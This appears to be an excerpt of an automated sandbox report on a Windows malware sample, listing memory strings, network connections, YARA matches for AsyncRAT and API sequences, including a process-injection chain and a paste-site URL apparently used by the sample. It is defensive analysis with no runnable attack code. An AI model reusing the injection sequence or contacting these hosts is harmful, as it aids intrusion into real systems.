                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                Source: svchost.exe, 0000000B.00000002.2666864067.0000013DE283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DjY9H7NyiNrCi
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600g:OOBEignInAuthUp
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                Source: svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369560107.0000013DE2157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368989429.0000013DE215A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpng
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf57
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                Source: svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/px
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srff
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                Source: svchost.exe, 0000000B.00000002.2645982875.0000013DE18D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                Source: svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/ppsecure/deviceaddcredential.srf
                Source: svchost.exe, 0000000B.00000002.2671562687.0000013DE28A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comnui
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf=
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                Source: svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                Source: svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                Source: wzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/tranr/raw
                Source: svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                Source: unknownNetwork traffic detected: HTTP traffic on port 52294 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52317
                Source: unknownNetwork traffic detected: HTTP traffic on port 52397 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52397
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
                Source: unknownNetwork traffic detected: HTTP traffic on port 52458 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52493 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52496 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52505 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52481
                Source: unknownNetwork traffic detected: HTTP traffic on port 52509 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52501 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52486 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52484 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 52375 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 52287 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
                Source: unknownNetwork traffic detected: HTTP traffic on port 52323 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52487
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52287
                Source: unknownNetwork traffic detected: HTTP traffic on port 52419 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52485
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52403
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52447
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52323
                Source: unknownNetwork traffic detected: HTTP traffic on port 52474 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52344 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52368
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52489
                Source: unknownNetwork traffic detected: HTTP traffic on port 52492 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52447 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
                Source: unknownNetwork traffic detected: HTTP traffic on port 52499 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52510 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52493
                Source: unknownNetwork traffic detected: HTTP traffic on port 52504 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52491
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52294
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
                Source: unknownNetwork traffic detected: HTTP traffic on port 52489 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52500 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52481 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52317 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 52485 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52419
                Source: unknownNetwork traffic detected: HTTP traffic on port 52491 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52497
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52495
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52375
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52458
                Source: unknownNetwork traffic detected: HTTP traffic on port 52495 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52499
                Source: unknownNetwork traffic detected: HTTP traffic on port 52507 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52498 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52503 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52350 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52505
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52503
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52509
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52507
                Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52344
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52501
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
                Source: unknownNetwork traffic detected: HTTP traffic on port 52490 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
                Source: unknownNetwork traffic detected: HTTP traffic on port 52497 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52350
                Source: unknownNetwork traffic detected: HTTP traffic on port 52403 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52502 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52487 -> 443
                Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.7:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52493 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52497 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52500 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52504 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52509 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5928DC NtEnumerateValueKey,NtEnumerateValueKey,1_2_000002616F5928DC
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF6B5AD10C0
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1E28DC NtEnumerateValueKey,NtEnumerateValueKey,6_2_000001CA7D1E28DC
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,8_2_00000265B3C02544
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02034 NtQuerySystemInformation,StrCmpNIW,8_2_00000265B3C02034
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52034 NtQuerySystemInformation,StrCmpNIW,9_2_0000017D2DD52034
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_0000017D2DD52544
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2722034 NtQuerySystemInformation,StrCmpNIW,11_2_0000013DE2722034
